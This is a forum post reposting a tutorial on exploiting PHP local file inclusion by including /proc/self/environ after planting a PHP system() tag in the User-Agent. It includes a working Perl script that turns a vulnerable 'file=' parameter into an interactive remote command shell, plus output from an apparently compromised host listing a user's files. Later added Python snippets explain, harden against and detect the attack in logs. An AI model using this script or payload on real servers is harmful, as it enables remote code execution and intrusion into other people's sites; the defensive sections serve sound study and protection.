Browsing around in search of knowledge, I came across the following tutorial, "Tecnica LFI".
I thought it might interest someone; I tried translating it but it didn't come out well, so I decided to post the original.
Tecnica LFI
When a request for a PHP page is made, Apache forks (creating a new process) and execs the PHP binary to actually run/interpret the script. That is the CGI/suPHP style of execution, and it matters here: with mod_php the interpreter lives inside the Apache worker and the request headers are not placed in that process's environment, so the trick below needs PHP running as a CGI (which is also why the shell obtained further down runs as the account owner rather than as the web server user). As on every *nix system, each running process has its own /proc entry, which can be quite useful to us, since it holds a lot of information about the process and the environment it is running in.
More specifically, the file /proc/self/environ of a running PHP process holds something like this (entries are NUL-separated; the NUL bytes show up as stray characters in the dump):
Código:
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=webmaster@this.domain
(...)
(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentoo
HTTP_KEEP_ALIVE=300
(...)
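To make the mechanism concrete, here is an added example (not part of the original tutorial) that parses a /proc/&lt;pid&gt;/environ blob in Python and reports which entries an attacker can steer. The sample environ bytes are constructed to resemble the dump above and assume a CGI-style PHP process, where the gateway exports request headers as HTTP_* variables; the "jcfs" markers and the `system('id')` payload are illustrative.

```python
import os
import re

# Constructed sample modelled on the environ dump above (not captured from a real host).
# A CGI gateway exports request headers as HTTP_* variables; entries are NUL-separated.
SAMPLE_ENVIRON = (
    b"PATH=/sbin:/usr/sbin:/bin:/usr/bin\0"
    b"SERVER_ADMIN=webmaster@this.domain\0"
    b"SCRIPT_FILENAME=/home/user/public_html/index.php\0"
    b"QUERY_STRING=file=../../../../../proc/self/environ\0"
    b"HTTP_USER_AGENT=jcfs<?php system('id'); ?>jcfs\0"
    b"HTTP_KEEP_ALIVE=300\0"
)

# CGI variables whose value comes straight from the client (RFC 3875 meta-variables).
CLIENT_CONTROLLED = ("HTTP_", "QUERY_STRING", "REQUEST_URI",
                     "PATH_INFO", "PATH_TRANSLATED", "CONTENT_TYPE")

# Anything include() would start interpreting as PHP: <?php, <?= or the short <? tag.
PHP_TAG = re.compile(rb"<\?(php|=)?", re.IGNORECASE)


def parse_environ(data: bytes) -> dict:
    """Split a /proc/<pid>/environ blob into a name -> value dict."""
    env = {}
    for entry in data.split(b"\0"):
        if not entry:
            continue                      # trailing NUL yields an empty entry
        name, _, value = entry.partition(b"=")
        env[name.decode("latin-1")] = value.decode("latin-1")
    return env


def injectable_entries(env: dict) -> dict:
    """Client-controlled variables that carry a PHP open tag.

    If the script include()s /proc/self/environ, each of these is executed."""
    return {
        name: value
        for name, value in env.items()
        if name.startswith(CLIENT_CONTROLLED) and PHP_TAG.search(value.encode("latin-1"))
    }


def own_environ() -> dict:
    """Parse the calling process's own environ (Linux only)."""
    with open("/proc/self/environ", "rb") as fh:
        return parse_environ(fh.read())


if __name__ == "__main__":
    env = parse_environ(SAMPLE_ENVIRON)
    print("client-controlled entries carrying PHP code:", injectable_entries(env))
    if os.path.exists("/proc/self/environ"):
        print("this process has", len(own_environ()), "environment entries")
```

Running it on a real CGI-served PHP host (via the vulnerable include, or locally on a box you own) shows the point of the tutorial: the only thing the attacker needs is one request-derived variable that ends up in the file PHP is told to include.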
That "Gentoo" is actually part of my browser's User-Agent. So guess what...
Imagine that we change the browser's User-Agent to a short PHP tag that calls system() and make a request like:
Código:
http://somesite.com/index.php?file=../../../../../proc/self/environ
You guessed right: it works. The PHP system() call is actually executed, because include() interprets whatever file it reads as PHP, and /proc/self/environ now contains our User-Agent.
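The root cause is the include() taking a path straight from the request. As an added example (not code from the tutorial), the following Python models the vulnerable resolution next to a hardened one; the include directory, page names and `.php` suffix are assumptions made for the illustration.

```python
import os
from typing import Optional

# Assumed layout for the example: includable pages live under pages/ inside the web root.
INCLUDE_DIR = "/home/user/public_html/pages"
ALLOWED_PAGES = ("home", "about", "contact")


def vulnerable_resolve(user_value: str) -> str:
    """Mirror of include($_GET['file']): the value is joined as given,
    so '../' sequences walk out of the web root and reach /proc/self/environ."""
    return os.path.normpath(os.path.join(INCLUDE_DIR, user_value))


def hardened_resolve(user_value: str) -> Optional[str]:
    """Two independent checks: allow-list the page name, then prove the final
    path still lies inside INCLUDE_DIR (defence in depth should the list grow
    or be replaced by a pattern). Returns None when the request is refused."""
    if user_value not in ALLOWED_PAGES:
        return None
    candidate = os.path.normpath(os.path.join(INCLUDE_DIR, user_value + ".php"))
    if os.path.commonpath([INCLUDE_DIR, candidate]) != INCLUDE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    payload = "../../../../../proc/self/environ"
    print("vulnerable:", vulnerable_resolve(payload))   # escapes the web root
    print("hardened:  ", hardened_resolve(payload))     # refused
    print("hardened:  ", hardened_resolve("about"))     # the one legitimate use
```

The containment check alone would already stop the traversal shown on this page; the allow-list additionally closes the other LFI routes (wrappers, uploaded files, log files) that a path check cannot reason about.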
So, after coding this little Perl script
Código:
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url     = $ARGV[0];    # vulnerable URL, up to and including "file="
my ($line, $response);

# Traverse up to the root and read the environ of the PHP process serving us
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while ($line = <STDIN>) {
    chop($line);
    # Put a PHP tag in the User-Agent; include() evaluates it when it reads environ.
    # The "jcfs" markers delimit the command output inside the response body.
    # (The PHP tag itself was lost to the forum's HTML filter in the posted copy and is
    #  reconstructed here from the text, which says system() is what gets executed.)
    $browser->agent("jcfs<?php system(\"$line 2>/dev/stdout\"); ?>jcfs");
    $response = $browser->get($url);
    if ($response->content =~ /jcfs(.*)jcfs/s) {
        print $1;
    }
    print "jcfsprompt: ";
}
I tried something like this...
jcfs@heaven ~/boxes $ perl lfi.pl (...)
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)
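From the defender's side, every step of the session above leaves a trace in the web server's access log: the traversal to /proc/self/environ in the request line and the PHP tag in the User-Agent. Here is an added detection example (not part of the tutorial) that runs over constructed Apache combined-format lines; the IP addresses, timestamps and the URL-encoded variant are made up for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not taken from a real server).
LOG_LINES = [
    '203.0.113.5 - - [21/Mar/2007:17:30:01 +0000] "GET /index.php?file=../../../../../proc/self/environ HTTP/1.1" 200 2341 "-" "jcfs<?php system(\'id\'); ?>jcfs"',
    '198.51.100.7 - - [21/Mar/2007:17:31:12 +0000] "GET /index.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 200 2341 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [21/Mar/2007:17:32:40 +0000] "GET /index.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; U; Linux i686) Gecko/20061201 Firefox/2.0.0.4 Gentoo"',
]

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PROC_ENVIRON = re.compile(r"/proc/(self|\d+)/environ", re.IGNORECASE)
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)


def analyse(line: str):
    """Return {'ip', 'target', 'reasons'} for one log line, or None if it does not parse."""
    m = COMBINED.match(line)
    if not m:
        return None
    # Decode twice so %252e-style double encoding does not slip past the check.
    target = unquote(unquote(m["target"]))
    reasons = []
    if PROC_ENVIRON.search(target):
        reasons.append("proc-environ-in-request")
    if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["referer"]):
        reasons.append("php-tag-in-header")
    return {"ip": m["ip"], "target": target, "reasons": reasons}


def flagged(lines):
    """Only the lines that triggered at least one indicator."""
    return [r for r in map(analyse, lines) if r and r["reasons"]]


if __name__ == "__main__":
    for hit in flagged(LOG_LINES):
        print(hit["ip"], ", ".join(hit["reasons"]), hit["target"])
```

The header check only works when the server actually logs the User-Agent and Referer (the combined format does; the plain common format does not), and the request-line check catches the traversal even when the payload is carried in a header that is not logged at all.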
I hope it was useful to someone.